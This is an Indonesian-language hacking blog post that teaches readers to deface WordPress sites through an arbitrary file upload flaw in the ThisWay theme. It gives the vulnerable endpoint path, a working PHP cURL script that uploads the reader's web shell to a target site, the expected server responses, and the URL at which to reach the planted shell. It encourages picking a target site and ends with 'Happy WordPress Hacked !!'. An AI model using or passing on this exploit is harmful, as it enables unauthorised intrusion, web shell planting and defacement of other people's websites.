Hallo Fans ,Nuenomaru disini .-.
maaf baru bisa posting/share artikel tutorial lagi
lg sibuk urus masadepan *asiikk wkwkwk
untuk artikel hari ini saya akan share salah satu bug/celah web berCMS Wordpress
kali ini Nue akan share Exploit Tutorial deface dengan WordPress ThisWay Arbitrary File Upload, etthoo,, ini exploit gak begitu baru loh .. *exploit lama wkwk
hahaha iseng2 aja share kali aja masih crotz
bahan bahan:
- PC yang tersambung dengan Internet
- Xampp
- Shell & Script Deface
- Kopi , sabun , Lilin (hukumnya sunah wkwkw :v ) - PC yang tersambung dengan Internet
- Xampp
- Shell & Script Deface
Langsung intip Tutorialnya
2. pilih salah satu web target yg pengen ente tusb0l pak wkwk, lalu masukan exploitnya.
exploit: /wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php
3. Vuln = {"status":"NOK","ERR":"This file is incorect"} atau Blank
*kurang lebih sih gituh wkwkwk *maaf kalo salah hehehe
4. Buat File Baru Berekstensi .php Contoh thisway.php Dan Simpan Script Berikut Di Directory C:/XAMPP/php Masukan Script Berikut Edit-Edit Dikit dan taruh juga shell sobat di directory yang sama dgn thisway.php tadi
<?php
$uploadfile="namashellente.php";
$ch = curl_init("target.crotz/wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
5. Buka Xampp kalian yang sudah terinstall, nyalakan apace sama mysql nya
6. Buka CMD dan ketikan perintah
cd C:/xampp/php
php namaexploitlo.php
7. jika sukses , akan muncul nama shell sobat di CMD (berupa random shell.php gitu deh) dan akan keluar lengkap link akses shell ente
{"status":"OK","imageID":12,"imageName":"settingimage_namarandomshellentenanti.php"}
8. Shell Akses: www.target.crotz/wp-content/uploads/thn/bln/settingsimage_randomnamashellente.php
done
bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART
Happy WordPress Hacked !!
Sekian dan semoga bermanfaat .. terimakasih
source and thanks to: 3XPLOI7 Bug
./Nuenomaru
Visit and follow :
2 comments
Ini kaya wp ghost theme ya um?
kurang lebih sih begituh eheheh
#Nuenomaru
EmoticonEmoticon